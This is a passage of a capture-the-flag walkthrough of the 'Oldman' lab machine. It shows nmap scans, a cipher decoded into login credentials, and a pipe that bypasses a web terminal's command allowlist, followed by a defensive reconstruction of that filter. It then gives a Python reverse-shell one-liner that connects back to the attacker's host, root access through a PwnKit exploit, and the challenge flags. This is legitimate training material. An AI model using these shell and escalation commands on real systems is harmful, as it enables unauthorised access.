Oldman

Target machine notes

  • QQ group: 660930334

I. Information Gathering

1. Host discovery

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:55 CST
Nmap scan report for 192.168.2.1
Host is up (0.00035s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00044s latency).
MAC Address: 08:00:27:8B:9E:BA (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.16
Host is up (0.00058s latency).
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.14 seconds

Target IP: 192.168.2.16

2. Port scanning

1) Full port scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:55 CST
Nmap scan report for 192.168.2.16
Host is up (0.00080s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 5.74 seconds

2) Service and version scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p80 192.168.2.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:56 CST
Nmap scan report for 192.168.2.16
Host is up (0.00080s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: HYH
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.01 seconds

3) UDP scan

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sU --top-ports 100 192.168.2.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-24 14:56 CST
Nmap scan report for 192.168.2.16
Host is up (0.0011s latency).
Not shown: 55 closed udp ports (port-unreach), 44 open|filtered udp ports (no-response)
PORT STATE SERVICE
5353/udp open zeroconf
MAC Address: 08:00:27:C5:75:79 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.81 seconds

II. Web Penetration

Browsing to port 80 shows an image, which looks like some kind of cipher.

1. Footprint alphabet

After some searching, the cipher in the image turns out to be the footprint alphabet.

Comparing the symbols against that alphabet, it decodes to: HYHFOREVER

2. Directory scanning

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# dirsearch -u "http://192.168.2.16"
...
[15:04:53] 200 - 1KB - /login.php
[15:04:53] 200 - 1KB - /login
[15:04:54] 200 - 1KB - /login/
[15:04:54] 200 - 1KB - /login/admin/admin.asp
[15:04:54] 200 - 1KB - /login/admin/
[15:04:54] 200 - 1KB - /login/cpanel.php
[15:04:54] 200 - 1KB - /login/administrator/
[15:04:54] 200 - 1KB - /login/cpanel.jsp
[15:04:54] 200 - 1KB - /login/cpanel.aspx
[15:04:54] 200 - 1KB - /login/cpanel.html
[15:04:54] 200 - 1KB - /login/cpanel.js
[15:04:54] 200 - 1KB - /login/login
[15:04:54] 200 - 1KB - /login/index
[15:04:54] 200 - 1KB - /login/cpanel/
[15:04:54] 200 - 1KB - /login/oauth/
[15:04:54] 200 - 1KB - /login/super
[15:04:54] 302 - 20B - /logout -> login.php
[15:04:54] 302 - 20B - /logout.php -> login.php
[15:04:54] 302 - 20B - /logout/ -> login.php
[15:05:15] 403 - 238B - /server-status
[15:05:15] 403 - 238B - /server-status/

Task Completed

Visiting /login brings up a login page. Logging in with the credentials recovered above, hyh:hyhforever, succeeds and lands on a terminal management page.

3. Bypassing the command restriction

The page states that only ls, pwd, whoami, id, date, uname, echo and cat may be executed. After some testing, a | can be used to bypass the restriction and run whatever command follows it.
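To make that bypass concrete from the defender's side, here is an added example (not code from the walkthrough, and not the target's own web terminal, whose source is not shown) contrasting a first-word allowlist, which a pipe defeats, with a check that rejects shell metacharacters, tokenizes with shlex and executes the argv without any shell:

```python
"""Hypothetical reconstruction of the restricted web terminal's filter.

Assumption (not from the page): the original filter only compared the first
word of the input against the allowlist and then ran the whole string through
a shell, which is exactly what 'id | <anything>' abuses.
"""
import shlex
import subprocess

ALLOWED = {"ls", "pwd", "whoami", "id", "date", "uname", "echo", "cat"}
# Characters that let a shell chain, redirect or substitute commands.
SHELL_METACHARS = set("|&;<>$`()\n")


def naive_is_allowed(cmdline: str) -> bool:
    """Weak check: inspects only the first word. With shell=True execution
    downstream, 'id | cat /etc/shadow' passes because 'id' is allowed."""
    first = cmdline.strip().split(" ", 1)[0]
    return first in ALLOWED


def hardened_is_allowed(cmdline: str) -> bool:
    """Reject any shell metacharacter outright, tokenize with shlex (so quoting
    is handled the way a shell would), and require argv[0] to be allowed."""
    if any(ch in SHELL_METACHARS for ch in cmdline):
        return False
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes
        return False
    return bool(argv) and argv[0] in ALLOWED


def run_restricted(cmdline: str) -> str:
    """Execute only after the hardened check, as an argv list with no shell,
    so nothing in the user's input is ever parsed by /bin/sh."""
    if not hardened_is_allowed(cmdline):
        raise PermissionError("command not allowed")
    argv = shlex.split(cmdline)
    proc = subprocess.run(argv, capture_output=True, text=True, check=False)
    return proc.stdout
```

Note that even the hardened form still lets an allowed program such as cat read any file the web server user can; the allowlist governs the program, not its arguments.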

III. Getting a www-data Shell

Reverse shell with Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Shell obtained

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.16] 56633
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stabilizing the shell

python -c 'import pty;pty.spawn("/bin/bash")';
# press Ctrl+Z to suspend it
stty raw -echo;fg
# press Enter
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

IV. Privilege Escalation

1. Getting the hyh user

Using the credential recovered earlier, hyhforever, switching to the hyh user succeeds.

www-data@Oldman:/tmp$ su hyh
Password:
hyh@Oldman:/tmp$ id
uid=1000(hyh) gid=1000(hyh) groups=1000(hyh)

2. Getting root

Running linpeas reveals a kernel privilege-escalation vulnerability. Note that CVE-2021-4034 (PwnKit), used below, is a flaw in polkit's setuid pkexec helper rather than in the kernel itself.

Check the kernel version

hyh@Oldman:/tmp$ uname -r
3.11.0-15-generic

Exploit script:
https://codeload.github.com/berdav/CVE-2021-4034/zip/main

Build with make

hyh@Oldman:/tmp$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Root obtained

hyh@Oldman:/tmp$ ./cve-2021-4034          
# id
uid=0(root) gid=0(root) groups=0(root),1000(hyh)

V. Getting the Flags

# cat /home/hyh/Desktop/user.txt /root/root.txt
flag{user-11a951681e76cf2cb51896e29916cf4d}
flag{root-e5ef24d17e710f36179588a66b667197}

Source: Oldman, http://miao-sec.github.io/Maze-sec/Oldman/
Author: Miao
Published: January 9, 2026
License: BY-MIAO